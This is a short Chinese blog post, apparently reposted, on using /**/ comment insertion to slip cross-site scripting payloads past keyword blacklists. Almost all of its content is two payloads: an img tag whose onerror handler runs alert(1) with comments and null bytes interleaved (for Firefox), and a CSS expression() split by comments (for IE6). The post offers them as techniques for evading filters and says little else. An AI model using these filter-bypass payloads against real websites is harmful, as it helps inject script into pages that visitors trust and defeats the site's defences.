码迷,mamicode.com
首页 > 其他好文 > 详细

利用/**/来绕过黑名单

时间:2018-02-19 19:00:19      阅读:134      评论:0      收藏:0      [点我收藏+]

标签:alert   src   式表   插入   body   idt   注释   字符   exp   

火狐下:
<img/srC="x"/*%00*/oneRror=/**/alert(1)/*%00*/>
 
IE6下:
样式表中的/**/会被浏览器忽略,因此可以运用/**/来注释字符,通过插入/**/来绕过过滤如下:
 
<img src="1" style="width: exp/**/re/**/ss/**/ion(alert(‘xss‘));">
 

利用/**/来绕过黑名单

标签:alert   src   式表   插入   body   idt   注释   字符   exp   

原文地址:https://www.cnblogs.com/xxrens/p/8454219.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!